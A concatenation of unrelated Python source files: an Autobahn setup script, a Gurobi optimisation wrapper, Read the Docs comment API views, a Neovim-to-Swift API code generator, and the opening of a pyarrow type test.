* The Web Application Messaging Protocol (WAMP)
for Twisted and Asyncio on Python 2 and 3.
Autobahn|Python is part of the Autobahn project:
The Autobahn project provides open-source implementations of the
WebSocket and WAMP protocols. WebSocket allows bidirectional real-time
messaging on the Web and WAMP adds asynchronous Remote Procedure Calls
and Publish & Subscribe on top of WebSocket.
More information:
* https://github.com/tavendo/AutobahnPython/blob/master/README.md
* http://autobahn.ws/python
* http://wamp.ws
Source code:
* https://github.com/tavendo/AutobahnPython
"""
## get version string from "autobahn/__init__.py"
## See: http://stackoverflow.com/a/7071358/884770
##
import re
VERSIONFILE="autobahn/__init__.py"
with open(VERSIONFILE, "rt") as f:
   verstrline = f.read()
VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]"
mo = re.search(VSRE, verstrline, re.M)
if mo:
verstr = mo.group(1)
else:
raise RuntimeError("Unable to find version string in %s." % (VERSIONFILE,))
## Autobahn core packages
##
packages = ['autobahn',
'autobahn.wamp',
'autobahn.websocket',
'autobahn.asyncio',
'autobahn.twisted',
'twisted.plugins',
'autobahn.wamp1', # WAMPv1 - remove this later
]
if PY3:
if PY33:
## "Tulip"
asyncio_packages = ["asyncio>=0.2.1"]
else:
## Python 3.4+ has asyncio builtin
asyncio_packages = []
else:
## backport of asyncio
asyncio_packages = ["trollius>=0.1.2", "futures>=2.1.5"]
## Now install Autobahn ..
##
setup(
name = 'autobahn',
version = verstr,
description = 'Autobahn|Python provides WebSocket and WAMP for Twisted and Asyncio',
long_description = LONGSDESC,
license = 'Apache License 2.0',
author = 'Tavendo GmbH',
author_email = 'autobahnws@googlegroups.com',
url = 'http://autobahn.ws/python',
   platforms = 'Any',
install_requires = ['zope.interface>=4.0.2'],
extras_require = {
## asyncio is needed for Autobahn/asyncio
'asyncio': asyncio_packages,
## you need Twisted for Autobahn/Twisted - obviously
'twisted': ["Twisted>=11.1"],
## native WebSocket and JSON acceleration: this should ONLY be used on CPython
'accelerate': ["wsaccel>=0.6.2", "ujson>=1.33"] if CPY else [],
## for (non-standard) WebSocket compression methods - not needed if you
## only want standard WebSocket compression ("permessage-deflate")
'compress': ["python-snappy>=0.5", "lz4>=0.2.1"],
## needed if you want WAMPv2 binary serialization support
'serialization': ["msgpack-python>=0.4.0"]
},
packages = packages,
zip_safe = False,
## http://pypi.python.org/pypi?%3Aaction=list_classifiers
##
classifiers = ["License :: OSI Approved :: Apache Software License",
"Development Status :: 5 - Production/Stable",
"Environment :: No Input/Output (Daemon)",
"Framework :: Twisted",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Programming Language :: Python :: Implementation :: Jython",
"Topic :: Internet",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Communications",
"Topic :: System :: Distributed Computing",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Software Development :: Object Brokering"],
keywords = 'autobahn autobahn.ws websocket realtime rfc6455 wamp rpc pubsub twisted asyncio'
)
try:
from twisted.internet import reactor
except ImportError:
HAS_TWISTED = False
else:
HAS_TWISTED = True
if HAS_TWISTED:
# Make Twisted regenerate the dropin.cache, if possible. This is necessary
# because in a site-wide install, dropin.cache cannot be rewritten by
# normal users.
try:
from twisted.plugin import IPlugin, getPlugins
list(getPlugins(IPlugin))
except Exception as e:
log.warn("Failed to update Twisted plugin cache: {}".format(e))
else:
log.info("Twisted dropin.cache regenerated.")
## verify that Autobahn Twisted endpoints have been installed
try:
from twisted.internet.interfaces import IStreamServerEndpointStringParser
from twisted.internet.interfaces import IStreamClientEndpointStringParser
has_server_endpoint = False
for plugin in getPlugins(IStreamServerEndpointStringParser):
if plugin.prefix == "autobahn":
has_server_endpoint = True
break
if has_server_endpoint:
log.info("Autobahn Twisted stream server endpoint successfully installed")
else:
log.warn("Autobahn Twisted stream server endpoint installation seems to have failed")
has_client_endpoint = False
for plugin in getPlugins(IStreamClientEndpointStringParser):
if plugin.prefix == "autobahn":
has_client_endpoint = True
break
if has_client_endpoint:
log.info("Autobahn Twisted stream client endpoint successfully installed")
else:
log.warn("Autobahn Twisted stream client endpoint installation seems to have failed")
   except Exception:
log.warn("Autobahn Twisted endpoint installation could not be verified")
|
|
import os
import sys
from fractions import Fraction
import gurobipy
from gurobipy import *
import tft_expr
import tft_error_form
# ==== global variables ====
VERBOSE = False
# ==== class ====
class GurobiSolver:
solver = None
var_expr_2_gurobi_var = None
n_linear_cons = 0
n_quadratic_cons = 0
opt_obj = None
gurobi_var_2_opt_val = None
def __init__ (self):
self.reset()
def reset (self):
self.solver = gurobipy.Model()
if (not VERBOSE):
self.solver.setParam('OutputFlag',False)
self.var_expr_2_gurobi_var = {}
self.n_linear_cons = 0
self.n_quadratic_cons = 0
self.opt_obj = None
self.gurobi_var_2_opt_val = {}
def getNewLinearConsName (self):
ret = "c" + str(self.n_linear_cons)
self.n_linear_cons = self.n_linear_cons + 1
return ret
def getNewQuadraticConsName (self):
ret = "qc" + str(self.n_quadratic_cons)
self.n_quadratic_cons = self.n_quadratic_cons + 1
return ret
def convertExpr (self, expr):
assert(isinstance(expr, tft_expr.Expr))
if (isinstance(expr, tft_expr.ConstantExpr)):
return float(expr.toCString())
elif (isinstance(expr, tft_expr.VariableExpr)):
if (expr not in self.var_expr_2_gurobi_var):
print ("???? " + str(expr))
assert(expr in self.var_expr_2_gurobi_var)
return self.var_expr_2_gurobi_var[expr]
elif (isinstance(expr, tft_expr.BinaryExpr)):
tasks = []
tasks.append(["left", expr.operator.label, expr.lhs(), expr.rhs()])
convert_rel = None
while (True):
this_task = tasks[len(tasks)-1]
assert(len(this_task) == 4)
assert(this_task[0] in ["left", "right", "combine"])
assert(this_task[1] in ["+", "-", "*", "/"])
tasks = tasks[0:len(tasks)-1]
if (this_task[0] == "combine"):
c_rel = None
if (this_task[1] == "+"):
c_rel = this_task[2] + this_task[3]
elif (this_task[1] == "-"):
c_rel = this_task[2] - this_task[3]
elif (this_task[1] == "*"):
c_rel = this_task[2] * this_task[3]
elif (this_task[1] == "/"):
c_rel = this_task[2] / this_task[3]
else:
sys.exit("ERROR: not supported operation for gurobi")
assert(c_rel is not None)
if (len(tasks) == 0):
convert_rel = c_rel
break
last_task = tasks[len(tasks)-1]
if (last_task[0] == "combine"):
sys.exit("ERROR: invalid consequent combines...")
elif (last_task[0] == "left"):
tasks[len(tasks)-1] = ["right", last_task[1], c_rel, last_task[3]]
elif (last_task[0] == "right"):
tasks[len(tasks)-1] = ["combine", last_task[1], last_task[2], c_rel]
else:
sys.exit("ERROR: invalid action of task...")
elif (this_task[0] == "left"):
if (isinstance(this_task[2], tft_expr.ConstantExpr) or isinstance(this_task[2], tft_expr.VariableExpr)):
tasks.append(["right", this_task[1], self.convertExpr(this_task[2]), this_task[3]])
elif (isinstance(this_task[2], tft_expr.BinaryExpr)):
tasks.append(this_task)
tasks.append(["left", this_task[2].operator.label, this_task[2].lhs(), this_task[2].rhs()])
else:
assert(False), "Not supported expr. type for Gurobi..."
elif (this_task[0] == "right"):
if (isinstance(this_task[3], tft_expr.ConstantExpr) or isinstance(this_task[3], tft_expr.VariableExpr)):
tasks.append(["combine", this_task[1], this_task[2], self.convertExpr(this_task[3])])
elif (isinstance(this_task[3], tft_expr.BinaryExpr)):
tasks.append(this_task)
tasks.append(["left", this_task[3].operator.label, this_task[3].lhs(), this_task[3].rhs()])
else:
assert("ERROR: not supported expr. type...")
else:
assert("ERROR: not supported expr. type...")
assert(len(tasks) == 0)
assert(convert_rel is not None)
return convert_rel
else:
sys.exit("ERROR: invalid expr. type for convertExpr...")
def getVar (self, ve):
assert(isinstance(ve, tft_expr.VariableExpr))
assert(ve in self.var_expr_2_gurobi_var.keys())
return self.var_expr_2_gurobi_var[ve]
def addVar (self, ve):
assert(isinstance(ve, tft_expr.VariableExpr))
if (ve.label().startswith(tft_expr.GROUP_ERR_VAR_PREFIX) or ve.label().startswith(tft_expr.ERR_VAR_PREFIX)):
assert(ve.type() == int)
if (ve in self.var_expr_2_gurobi_var.keys()):
return
# add variable
var = ""
if (ve.type() == int):
var = self.solver.addVar(vtype=GRB.INTEGER, name=ve.label())
elif (ve.type() == Fraction):
var = self.solver.addVar(name=ve.label())
else:
sys.exit("ERROR: invalid type of VariableExpr found when asking gurobi for OptimizeExpr")
self.var_expr_2_gurobi_var[ve] = var
self.solver.update()
# write range
if (ve.hasBounds()):
# check lower bound
if (ve.lb().value() < Fraction(0, 1)):
sys.exit("ERROR: variable's (" + ve.label() +") lower bound must be greater than 0")
# add constraint
self.addConstraint("linear", "<=", ve.lb(), ve)
self.addConstraint("linear", "<=", ve, ve.ub())
def addConstraint (self, ctype, comp, lhs_expr, rhs_expr):
assert(ctype == "linear" or ctype == "quadratic")
assert(comp == "==" or comp == "<=" or comp == ">=")
assert(isinstance(lhs_expr, tft_expr.Expr))
assert(isinstance(rhs_expr, tft_expr.Expr))
lhs = self.convertExpr(lhs_expr)
rhs = self.convertExpr(rhs_expr)
func_adder = ""
func_namer = ""
if (ctype == "linear"):
func_adder = self.solver.addConstr
func_namer = self.getNewLinearConsName
elif (ctype == "quadratic"):
func_adder = self.solver.addQConstr
func_namer = self.getNewQuadraticConsName
else:
sys.exit("ERROR: invalid cons. type")
if (comp == "=="):
func_adder(lhs == rhs, func_namer())
elif (comp == "<"):
func_adder(lhs < rhs, func_namer())
elif (comp == "<="):
func_adder(lhs <= rhs, func_namer())
elif (comp == ">"):
func_adder(lhs > rhs, func_namer())
elif (comp == ">="):
func_adder(lhs >= rhs, func_namer())
else:
sys.exit("ERROR: invalid comparator")
# set optimization objective
def setOptObj (self, obj_expr, opt_dir):
assert(opt_dir == "max" or opt_dir == "min")
assert(isinstance(obj_expr, tft_expr.Expr))
self.opt_obj = 0 + self.convertExpr(obj_expr)
if (opt_dir == "max"):
self.solver.setObjective(self.opt_obj, GRB.MAXIMIZE)
elif (opt_dir == "min"):
self.solver.setObjective(self.opt_obj, GRB.MINIMIZE)
else:
sys.exit("ERROR: invalid opt. direction...")
def goOpt (self):
        assert(self.opt_obj is not None)
self.solver.optimize()
opt_rel = self.solver.getAttr("Status")
# get opt. value
opt_val = None
if (opt_rel == GRB.OPTIMAL):
if (VERBOSE):
print ("-- got opt. solution --")
opt_val = self.opt_obj.getValue()
assert(type(opt_val) is float)
else:
self.solver.setParam("DualReductions", 0)
self.solver.optimize()
if (VERBOSE):
if (opt_rel == GRB.INFEASIBLE):
print ("-- infeasible... --")
elif (opt_rel == GRB.INF_OR_UNBD):
print ("-- infeasible or unbounded... --")
elif (opt_rel == GRB.UNBOUNDED):
print ("-- unbounded... --")
else:
print ("-- ?? solution status... --")
return None
if (VERBOSE):
print ("---- opt. report ----")
            print ('optimized obj: %g' % opt_val)
print ("---------------------")
# get var. values
if (VERBOSE):
print ("---- var. values ----")
for v in self.solver.getVars():
var = self.solver.getVarByName(v.varName)
self.gurobi_var_2_opt_val[var] = Fraction(v.x)
if (VERBOSE):
print ('var. : %s = %g' % (v.varName, v.x))
if (VERBOSE):
print ("---------------------")
# return
return Fraction(opt_val)
def getOptVarValue (self, ve):
assert(isinstance(ve, tft_expr.VariableExpr))
if (ve in self.var_expr_2_gurobi_var.keys()):
if (self.var_expr_2_gurobi_var[ve] in self.gurobi_var_2_opt_val.keys()):
return self.gurobi_var_2_opt_val[self.var_expr_2_gurobi_var[ve]]
else:
return None
else:
return None
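# Standalone sketch of the iterative "left"/"right"/"combine" task-stack
# pattern convertExpr() uses above, applied to plain nested tuples instead of
# tft_expr nodes so it runs without Gurobi. All names here are illustrative.
def _eval_binary_tree(expr):
    # expr is either a number or a tuple (op, lhs, rhs).
    if not isinstance(expr, tuple):
        return expr
    ops = {'+': lambda a, b: a + b, '-': lambda a, b: a - b,
           '*': lambda a, b: a * b, '/': lambda a, b: a / b}
    tasks = [["left", expr[0], expr[1], expr[2]]]
    result = None
    while tasks:
        state, op, lhs, rhs = tasks.pop()
        if state == "combine":
            value = ops[op](lhs, rhs)
            if not tasks:
                result = value
                break
            last = tasks[-1]
            if last[0] == "left":
                # The combined value becomes the converted left operand.
                tasks[-1] = ["right", last[1], value, last[3]]
            else:
                # The combined value becomes the converted right operand.
                tasks[-1] = ["combine", last[1], last[2], value]
        elif state == "left":
            if isinstance(lhs, tuple):
                tasks.append(["left", op, lhs, rhs])
                tasks.append(["left", lhs[0], lhs[1], lhs[2]])
            else:
                tasks.append(["right", op, lhs, rhs])
        else:  # state == "right"
            if isinstance(rhs, tuple):
                tasks.append(["right", op, lhs, rhs])
                tasks.append(["left", rhs[0], rhs[1], rhs[2]])
            else:
                tasks.append(["combine", op, lhs, rhs])
    return result


# (1 + 2) * (10 - 4) == 18
assert _eval_binary_tree(('*', ('+', 1, 2), ('-', 10, 4))) == 18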
|
|
import json
from django.contrib.auth.decorators import login_required
from django.http.response import HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.utils.decorators import method_decorator
from rest_framework import permissions, status
from rest_framework.decorators import (
api_view,
authentication_classes,
permission_classes,
renderer_classes,
detail_route
)
from rest_framework.exceptions import ParseError
from rest_framework.permissions import IsAuthenticated
from rest_framework.renderers import JSONRenderer, JSONPRenderer, BrowsableAPIRenderer
from rest_framework.response import Response
from rest_framework.serializers import ModelSerializer, Serializer
from rest_framework.viewsets import ModelViewSet
from sphinx.websupport import WebSupport
from readthedocs.comments.models import (
DocumentComment, DocumentNode, NodeSnapshot, DocumentCommentSerializer,
DocumentNodeSerializer, ModerationActionSerializer)
from readthedocs.privacy.backend import AdminNotAuthorized
from readthedocs.projects.models import Project
from readthedocs.restapi.permissions import IsOwner, CommentModeratorOrReadOnly
from .backend import DjangoStorage
from .session import UnsafeSessionAuthentication
storage = DjangoStorage()
support = WebSupport(
srcdir='/Users/eric/projects/readthedocs.org/docs',
builddir='/Users/eric/projects/readthedocs.org/docs/_build/websupport',
datadir='/Users/eric/projects/readthedocs.org/docs/_build/websupport/data',
storage=storage,
docroot='websupport',
)
########
# called by javascript
########
@api_view(['GET'])
@permission_classes([permissions.IsAuthenticatedOrReadOnly])
@renderer_classes((JSONRenderer, JSONPRenderer, BrowsableAPIRenderer))
def get_options(request):
base_opts = support.base_comment_opts
base_opts['addCommentURL'] = '/api/v2/comments/'
base_opts['getCommentsURL'] = '/api/v2/comments/'
return Response(base_opts)
@api_view(['GET'])
@permission_classes([permissions.IsAuthenticatedOrReadOnly])
@renderer_classes((JSONRenderer, JSONPRenderer, BrowsableAPIRenderer))
def get_metadata(request):
"""
Check for get_metadata
GET: page
"""
document = request.GET.get('page', '')
return Response(storage.get_metadata(docname=document))
@api_view(['GET', 'POST'])
@permission_classes([permissions.AllowAny])
@authentication_classes([UnsafeSessionAuthentication])
@renderer_classes((JSONRenderer, JSONPRenderer))
def attach_comment(request):
comment_id = request.POST.get('comment', '')
comment = DocumentComment.objects.get(pk=comment_id)
node_id = request.POST.get('node', '')
snapshot = NodeSnapshot.objects.get(hash=node_id)
comment.node = snapshot.node
serialized_comment = DocumentCommentSerializer(comment)
return Response(serialized_comment.data)
#######
# Normal Views
#######
def build(request):
support.build()
def serve_file(request, file):
document = support.get_document(file)
return render_to_response('doc.html',
{'document': document},
context_instance=RequestContext(request))
######
# Called by Builder
######
@api_view(['GET'])
@permission_classes([permissions.IsAuthenticatedOrReadOnly])
def has_node(request):
"""
Checks to see if a node exists.
GET: node_id - The node's ID to check
"""
node_id = request.GET.get('node_id', '')
exists = storage.has_node(node_id)
return Response({'exists': exists})
@api_view(['GET', 'POST'])
@permission_classes([permissions.AllowAny])
@authentication_classes([UnsafeSessionAuthentication])
@renderer_classes((JSONRenderer,))
def add_node(request):
post_data = request.DATA
project = Project.objects.get(slug=post_data['project'])
page = post_data.get('document', '')
node_hash = post_data.get('id', '')
version = post_data.get('version', '')
commit = post_data.get('commit', '')
project.add_node(node_hash, page, version=version, commit=commit)
return Response()
@api_view(['GET', 'POST'])
@permission_classes([permissions.AllowAny])
@authentication_classes([UnsafeSessionAuthentication])
@renderer_classes((JSONRenderer,))
def update_node(request):
post_data = request.DATA
try:
old_hash = post_data['old_hash']
new_hash = post_data['new_hash']
commit = post_data['commit']
project = post_data['project']
version = post_data['version']
page = post_data['page']
node = DocumentNode.objects.from_hash(
node_hash=old_hash, project_slug=project, version_slug=version,
page=page)
node.update_hash(new_hash, commit)
return Response(DocumentNodeSerializer(node).data)
except KeyError:
return Response("You must include new_hash and commit in POST payload to this view.",
status.HTTP_400_BAD_REQUEST)
class CommentViewSet(ModelViewSet):
serializer_class = DocumentCommentSerializer
permission_classes = [CommentModeratorOrReadOnly, permissions.IsAuthenticatedOrReadOnly]
def get_queryset(self):
qp = self.request.QUERY_PARAMS
if qp.get('node'):
try:
node = DocumentNode.objects.from_hash(version_slug=qp['version'],
page=qp['document_page'],
node_hash=qp['node'],
project_slug=qp['project'])
queryset = DocumentComment.objects.filter(node=node)
except KeyError:
raise ParseError(
'To get comments by node, you must also provide page, '
'version, and project.')
except DocumentNode.DoesNotExist:
queryset = DocumentComment.objects.none()
elif qp.get('project'):
queryset = DocumentComment.objects.filter(node__project__slug=qp['project'])
else:
queryset = DocumentComment.objects.all()
return queryset
@method_decorator(login_required)
def create(self, request):
project = Project.objects.get(slug=request.data['project'])
comment = project.add_comment(version_slug=request.data['version'],
page=request.data['document_page'],
hash=request.data['node'],
commit=request.data['commit'],
user=request.user,
text=request.data['text'])
serializer = self.get_serializer(comment)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
@detail_route(methods=['put'])
def moderate(self, request, pk):
comment = self.get_object()
decision = request.DATA['decision']
moderation_action = comment.moderate(request.user, decision)
return Response(ModerationActionSerializer(moderation_action).data)
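# Hedged usage sketch: how a client might query the comment endpoints above,
# assuming the '/api/v2/comments/' URL from get_options() is routed as shown
# and a server is running locally. The `requests` dependency and the host are
# assumptions, not part of this module.
import requests

_BASE = 'http://localhost:8000'


def list_comments_for_node(project, version, page, node_hash):
    # CommentViewSet.get_queryset() requires project, version, document_page
    # and node together when filtering by node.
    resp = requests.get(_BASE + '/api/v2/comments/', params={
        'project': project,
        'version': version,
        'document_page': page,
        'node': node_hash,
    })
    resp.raise_for_status()
    return resp.json()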
|
|
#!/usr/bin/env python3
import subprocess
import msgpack
from string import Template
import re
import textwrap
import os
import io
void_func_template = Template('''\
public func ${func_name}(${args}
expectsReturnValue: Bool = false
) -> Completable {
let params: [RxNeovimApi.Value] = [
${params}
]
if expectsReturnValue {
return self
.checkBlocked(
self.rpc(method: "${nvim_func_name}", params: params, expectsReturnValue: expectsReturnValue)
)
.asCompletable()
}
return self
.rpc(method: "${nvim_func_name}", params: params, expectsReturnValue: expectsReturnValue)
.asCompletable()
}
''')
get_mode_func_template = Template('''\
public func ${func_name}(${args}
) -> Single<${result_type}> {
let params: [RxNeovimApi.Value] = [
${params}
]
return self
.rpc(method: "${nvim_func_name}", params: params, expectsReturnValue: true)
.map { value in
guard let result = (${return_value}) else {
throw RxNeovimApi.Error.conversion(type: ${result_type}.self)
}
return result
}
}
''')
func_template = Template('''\
public func ${func_name}(${args}
errWhenBlocked: Bool = true
) -> Single<${result_type}> {
let params: [RxNeovimApi.Value] = [
${params}
]
func transform(_ value: Value) throws -> ${result_type} {
guard let result = (${return_value}) else {
throw RxNeovimApi.Error.conversion(type: ${result_type}.self)
}
return result
}
if errWhenBlocked {
return self
.checkBlocked(
self.rpc(method: "${nvim_func_name}", params: params, expectsReturnValue: true)
)
.map(transform)
}
return self
.rpc(method: "${nvim_func_name}", params: params, expectsReturnValue: true)
.map(transform)
}
''')
extension_template = Template('''\
// Auto generated for nvim version ${version}.
// See bin/generate_api_methods.py
import Foundation
import MessagePack
import RxSwift
extension RxNeovimApi {
public enum Error: Swift.Error {
${error_types}
case exception(message: String)
case validation(message: String)
case blocked
case conversion(type: Any.Type)
case unknown
init(_ value: RxNeovimApi.Value?) {
let array = value?.arrayValue
guard array?.count == 2 else {
self = .unknown
return
}
guard let rawValue = array?[0].uint64Value, let message = array?[1].stringValue else {
self = .unknown
return
}
switch rawValue {
${error_cases}
default: self = .unknown
}
}
}
}
extension RxNeovimApi {
$body
}
extension RxNeovimApi.Buffer {
public init?(_ value: RxNeovimApi.Value) {
guard let (type, data) = value.extendedValue else {
return nil
}
guard type == ${buffer_type} else {
return nil
}
guard let handle = (try? unpack(data))?.value.int64Value else {
return nil
}
self.handle = Int(handle)
}
}
extension RxNeovimApi.Window {
public init?(_ value: RxNeovimApi.Value) {
guard let (type, data) = value.extendedValue else {
return nil
}
guard type == ${window_type} else {
return nil
}
guard let handle = (try? unpack(data))?.value.int64Value else {
return nil
}
self.handle = Int(handle)
}
}
extension RxNeovimApi.Tabpage {
public init?(_ value: RxNeovimApi.Value) {
guard let (type, data) = value.extendedValue else {
return nil
}
guard type == ${tabpage_type} else {
return nil
}
guard let handle = (try? unpack(data))?.value.int64Value else {
return nil
}
self.handle = Int(handle)
}
}
fileprivate func msgPackDictToSwift(_ dict: Dictionary<RxNeovimApi.Value, RxNeovimApi.Value>?) -> Dictionary<String, RxNeovimApi.Value>? {
return dict?.compactMapToDict { k, v in
guard let strKey = k.stringValue else {
return nil
}
return (strKey, v)
}
}
fileprivate func msgPackArrayDictToSwift(_ array: [RxNeovimApi.Value]?) -> [Dictionary<String, RxNeovimApi.Value>]? {
return array?
.compactMap { v in v.dictionaryValue }
.compactMap { d in msgPackDictToSwift(d) }
}
extension Dictionary {
fileprivate func mapToDict<K, V>(_ transform: ((key: Key, value: Value)) throws -> (K, V)) rethrows -> Dictionary<K, V> {
let array = try self.map(transform)
return tuplesToDict(array)
}
fileprivate func compactMapToDict<K, V>(_ transform: ((key: Key, value: Value)) throws -> (K, V)?) rethrows -> Dictionary<K, V> {
let array = try self.compactMap(transform)
return tuplesToDict(array)
}
fileprivate func tuplesToDict<K:Hashable, V, S:Sequence>(_ sequence: S)
-> Dictionary<K, V> where S.Iterator.Element == (K, V) {
var result = Dictionary<K, V>(minimumCapacity: sequence.underestimatedCount)
for (key, value) in sequence {
result[key] = value
}
return result
}
}
''')
def snake_to_camel(snake_str):
components = snake_str.split('_')
return components[0] + "".join(x.title() for x in components[1:])
def nvim_type_to_swift(nvim_type):
if nvim_type == 'Boolean':
return 'Bool'
if nvim_type == 'Integer':
return 'Int'
if nvim_type == 'Float':
return nvim_type
if nvim_type == 'void':
return 'Void'
if nvim_type == 'String':
return 'String'
if nvim_type == 'Array':
return 'RxNeovimApi.Value'
if nvim_type == 'Dictionary':
return 'Dictionary<String, RxNeovimApi.Value>'
if nvim_type == 'Buffer':
return 'RxNeovimApi.Buffer'
if nvim_type == 'Window':
return 'RxNeovimApi.Window'
if nvim_type == 'Tabpage':
return 'RxNeovimApi.Tabpage'
if nvim_type == 'Object':
return 'RxNeovimApi.Value'
if nvim_type.startswith('ArrayOf('):
match = re.match(r'ArrayOf\((.*?)(?:, \d+)*\)', nvim_type)
return '[{}]'.format(nvim_type_to_swift(match.group(1)))
return 'RxNeovimApi.Value'
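# e.g. nvim_type_to_swift('ArrayOf(Integer)') -> '[Int]' and
# nvim_type_to_swift('ArrayOf(String, 2)') -> '[String]' (the fixed size is
# dropped); any unknown type falls back to 'RxNeovimApi.Value'.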
def msgpack_to_swift(msgpack_value_name, type):
if type == 'Bool':
return f'{msgpack_value_name}.boolValue'
if type == 'Int':
return f'({msgpack_value_name}.int64Value == nil ? nil : Int({msgpack_value_name}.int64Value!))'
if type == 'Float':
return f'{msgpack_value_name}.floatValue'
if type == 'Void':
        return '()'
if type == 'String':
return f'{msgpack_value_name}.stringValue'
if type == 'RxNeovimApi.Value':
return f'Optional({msgpack_value_name})'
    if type == 'RxNeovimApi.Buffer':
        return f'RxNeovimApi.Buffer({msgpack_value_name})'
    if type == 'RxNeovimApi.Window':
        return f'RxNeovimApi.Window({msgpack_value_name})'
    if type == 'RxNeovimApi.Tabpage':
        return f'RxNeovimApi.Tabpage({msgpack_value_name})'
if type.startswith('Dictionary<'):
return f'msgPackDictToSwift({msgpack_value_name}.dictionaryValue)'
if type.startswith('[Dictionary<'):
return f'msgPackArrayDictToSwift({msgpack_value_name}.arrayValue)'
if type.startswith('['):
element_type = re.match(r'\[(.*)\]', type).group(1)
return f'{msgpack_value_name}.arrayValue?.compactMap({{ v in {msgpack_to_swift("v", element_type)} }})'
return 'RxNeovimApi.Value'
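# e.g. msgpack_to_swift('value', 'Int') produces the Swift expression
# '(value.int64Value == nil ? nil : Int(value.int64Value!))'.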
def swift_to_msgpack_value(name, type):
if type == 'Bool':
return f'.bool({name})'
if type == 'Int':
return f'.int(Int64({name}))'
if type == 'Float':
return f'.float({name})'
if type == 'Void':
        return '.nil()'
if type == 'String':
return f'.string({name})'
if type == 'Dictionary<String, RxNeovimApi.Value>':
return f'.map({name}.mapToDict({{ (Value.string($0), $1) }}))'
if type == 'RxNeovimApi.Value':
return name
if type in ['RxNeovimApi.Buffer', 'RxNeovimApi.Window', 'RxNeovimApi.Tabpage']:
return f'.int(Int64({name}.handle))'
if type.startswith('['):
match = re.match(r'\[(.*)\]', type)
test = '$0'
return f'.array({name}.map {{ {swift_to_msgpack_value(test, match.group(1))} }})'
def parse_args(raw_params):
types = [nvim_type_to_swift(p[0]) for p in raw_params]
names = [p[1] for p in raw_params]
params = dict(zip(names, types))
result = '\n'.join([n + ': ' + t + ',' for n, t in params.items()])
if not result:
return ''
return '\n' + textwrap.indent(result, ' ')
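# e.g. parse_args([('Buffer', 'buffer'), ('Integer', 'index')]) yields the
# indented Swift parameter list 'buffer: RxNeovimApi.Buffer,' / 'index: Int,'
# for interpolation into the templates above.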
def parse_params(raw_params):
types = [nvim_type_to_swift(p[0]) for p in raw_params]
names = [p[1] for p in raw_params]
params = dict(zip(names, types))
result = '\n'.join([swift_to_msgpack_value(n, t) + ',' for n, t in params.items()])
return textwrap.indent(result, ' ').strip()
def parse_function(f):
args = parse_args(f['parameters'])
template = void_func_template if f['return_type'] == 'void' else func_template
template = get_mode_func_template if f['name'] == 'nvim_get_mode' else template
result = template.substitute(
func_name=snake_to_camel(f['name'][5:]),
nvim_func_name=f['name'],
args=args,
params=parse_params(f['parameters']),
result_type=nvim_type_to_swift(f['return_type']),
return_value=msgpack_to_swift('value', nvim_type_to_swift(f['return_type']))
)
return result
def parse_version(version):
return '.'.join([str(v) for v in [version['major'], version['minor'], version['patch']]])
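# e.g. parse_version({'major': 0, 'minor': 9, 'patch': 5}) -> '0.9.5'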
def parse_error_types(error_types):
return textwrap.indent(
'\n'.join(
[f'public static let {t.lower()}RawValue = UInt64({v["id"]})' for t, v in error_types.items()]
),
' '
).lstrip()
def parse_error_cases(error_types):
return textwrap.indent(
'\n'.join(
[f'case Error.{t.lower()}RawValue: self = .{t.lower()}(message: message)' for t, v in error_types.items()]
),
' '
).lstrip()
if __name__ == '__main__':
result_file_path = './Sources/RxPack/RxNeovimApi.generated.swift'
    nvim_path = os.environ.get('NVIM_PATH', 'nvim')
nvim_output = subprocess.run([nvim_path, '--api-info'], stdout=subprocess.PIPE)
api = msgpack.unpackb(nvim_output.stdout)
version = parse_version(api['version'])
functions = [f for f in api['functions'] if 'deprecated_since' not in f]
body = '\n'.join([parse_function(f) for f in functions])
result = extension_template.substitute(
body=body,
version=version,
error_types=parse_error_types(api['error_types']),
error_cases=parse_error_cases(api['error_types']),
buffer_type=api['types']['Buffer']['id'],
window_type=api['types']['Window']['id'],
tabpage_type=api['types']['Tabpage']['id']
)
with io.open(result_file_path, 'w') as api_methods_file:
api_methods_file.write(result)
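    # Assumed invocation (nvim on PATH, or pointed to via NVIM_PATH):
    #   NVIM_PATH=/path/to/nvim python3 bin/generate_api_methods.py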
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from collections import OrderedDict
from collections.abc import Iterator
from functools import partial
import datetime
import sys
import pickle
import pytest
import pytz
import hypothesis as h
import hypothesis.strategies as st
import hypothesis.extra.pytz as tzst
import weakref
import numpy as np
import pyarrow as pa
import pyarrow.types as types
import pyarrow.tests.strategies as past
def get_many_types():
    # Returning them from a function is required because the pa.dictionary
    # type holds a pyarrow array, and test_array.py::test_total_bytes_allocated
    # checks that the default memory pool has zero allocated bytes.
return (
pa.null(),
pa.bool_(),
pa.int32(),
pa.time32('s'),
pa.time64('us'),
pa.date32(),
pa.timestamp('us'),
pa.timestamp('us', tz='UTC'),
pa.timestamp('us', tz='Europe/Paris'),
pa.duration('s'),
pa.float16(),
pa.float32(),
pa.float64(),
pa.decimal128(19, 4),
pa.decimal256(76, 38),
pa.string(),
pa.binary(),
pa.binary(10),
pa.large_string(),
pa.large_binary(),
pa.list_(pa.int32()),
pa.list_(pa.int32(), 2),
pa.large_list(pa.uint16()),
pa.map_(pa.string(), pa.int32()),
pa.map_(pa.field('key', pa.int32(), nullable=False),
pa.field('value', pa.int32())),
pa.struct([pa.field('a', pa.int32()),
pa.field('b', pa.int8()),
pa.field('c', pa.string())]),
